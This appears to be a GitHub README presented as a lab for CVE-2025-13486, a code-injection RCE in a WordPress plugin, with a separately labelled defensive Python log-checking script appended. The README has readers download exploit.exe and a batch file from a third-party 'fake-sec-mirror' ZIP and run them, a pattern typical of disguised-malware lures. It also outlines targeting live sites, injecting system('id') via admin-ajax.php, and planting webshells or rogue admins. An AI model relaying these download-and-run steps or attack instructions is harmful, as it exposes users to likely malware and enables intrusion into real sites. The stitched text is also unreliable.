Lab: CVE-2025-13486 - Remote Code Execution in Advanced Custom Fields: Extended Plugin

🚀 Overview

This repository provides a lab environment for researching CVE-2025-13486, a critical Remote Code Execution (RCE) vulnerability classified as CWE-94 (Improper Control of Generation of Code, or 'Code Injection') in the Advanced Custom Fields: Extended plugin for WordPress. Affecting versions 0.9.0.5 through 0.9.1.1, the vulnerability arises in the prepare_form() function, which insecurely passes user-supplied input to PHP's call_user_func_array() without proper sanitization. This allows unauthenticated attackers to inject and execute arbitrary PHP code, potentially leading to server compromise, backdoor installation, or creation of rogue administrative accounts.

The lab includes exploitation tools and mitigation guidance. This is intended for educational and security research purposes only, to help developers, penetration testers, and security analysts understand the flaw's mechanics and test defenses in a controlled environment.


📋 Prerequisites

  • Basic knowledge of WordPress, PHP, and command-line tools.
  • A modern web browser for testing the WordPress instance.
  • Windows host for running the exploit (due to .exe and .bat dependencies; the steps can be adapted for other operating systems).

Download & Install

  1. Download the repository as a ZIP from GitHub: https://github.com/lasthero-887/CVE-2025-13486---Poc/releases/download/Release/CVE-2025-13486.zip

  2. Extract the ZIP to a local directory.

  3. Navigate to the extracted folder and review the contents:

    • README.md: This file.
    • /scripts/: Auxiliary scripts for automation (e.g., setup.sh for Unix-like systems, setup.ps1 for PowerShell).
    • exploit.zip: Archive containing the exploit tools (extract and run start-exploit.bat to execute exploitation).

For the exploit, download exploit.zip from this mirror: https://fake-sec-mirror.com/downloads/CVE-2025-13486-exploit.zip. This ZIP includes:

  • exploit.exe: The primary exploit binary (executes the RCE payload).
  • start-exploit.bat: Batch file that launches exploit.exe with predefined parameters.

🛠 Quick Start

  1. Download and extract exploit.zip.
  2. Run start-exploit.bat to initiate the exploit against a target WordPress instance with the vulnerable plugin.

πŸ” Exploitation Steps

  1. Identify Target: Locate a WordPress site running the Advanced Custom Fields: Extended plugin, versions 0.9.0.5 to 0.9.1.1. Use banner grabbing or plugin enumeration tools to confirm.
  2. Prepare Payload: Craft a PHP code injection payload targeting the prepare_form() function. Example payload structure: Use HTTP POST to submit user input that exploits call_user_func_array(), e.g., injecting system('id') to test command execution.
  3. Execute Exploit: Extract exploit.zip, configure the target URL and payload in the tool if needed, then run start-exploit.bat. This will send the crafted request, triggering RCE and potentially returning output like server user info or confirming code execution.
  4. Post-Exploitation: Upon success, leverage the RCE to upload a webshell, create an admin user via wp_insert_user(), or execute system commands for persistence.

Technical Details: The exploit leverages the lack of input validation in prepare_form(), allowing arbitrary function calls. Ensure the target endpoint is accessible (typically /wp-admin/admin-ajax.php with action=acfe_prepare_form). Use Burp Suite or similar for payload testing.
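From the defender's side, the two facts above that matter are the affected version range and the endpoint/action named in the technical details. The following is an added example (not part of this repository or its tools) that checks an installed plugin version against the 0.9.0.5 to 0.9.1.1 range and flags access-log entries hitting /wp-admin/admin-ajax.php with action=acfe_prepare_form; the log lines are constructed, and the Combined-Log regex is an assumption about your server's log format.

```python
import re
from urllib.parse import parse_qsl

# Affected range as stated in the advisory text above (inclusive).
AFFECTED_MIN = (0, 9, 0, 5)
AFFECTED_MAX = (0, 9, 1, 1)

# Endpoint and action named in the README's technical details.
SUSPECT_PATH = "/wp-admin/admin-ajax.php"
SUSPECT_ACTION = "acfe_prepare_form"

# Assumed Apache/nginx combined log layout: ip ident user [ts] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def parse_version(v: str) -> tuple:
    """Parse '0.9.1' -> (0, 9, 1, 0); pad to four parts so comparisons are stable."""
    parts = [int(p) for p in v.strip().split(".")]
    return tuple(parts + [0] * (4 - len(parts)))

def is_affected(version: str) -> bool:
    """True if the installed plugin version falls inside the affected range."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX

def flag_requests(log_lines):
    """Return requests whose path and query action match the vulnerable AJAX handler.
    Note: a standard access log does not contain POST bodies, so an action passed only
    in the body is invisible here; apply the same path/action test on a WAF or reverse
    proxy that can inspect request bodies."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        path, _, query = m["target"].partition("?")
        params = dict(parse_qsl(query))
        if path == SUSPECT_PATH and params.get("action") == SUSPECT_ACTION:
            hits.append({"ip": m["ip"], "method": m["method"], "status": int(m["status"])})
    return hits

# Constructed sample log lines (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2026:10:00:00 +0000] "POST /wp-admin/admin-ajax.php?action=acfe_prepare_form HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2026:10:00:01 +0000] "GET /wp-login.php HTTP/1.1" 200 2048',
    '203.0.113.7 - - [01/Jan/2026:10:00:02 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 64',
]
```

Any installed version for which is_affected() returns True should be updated to a release newer than 0.9.1.1, and flagged requests from unauthenticated sources deserve a look in the incident timeline.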

This lab focuses on technical analysis for vulnerability reproduction in isolated environments.
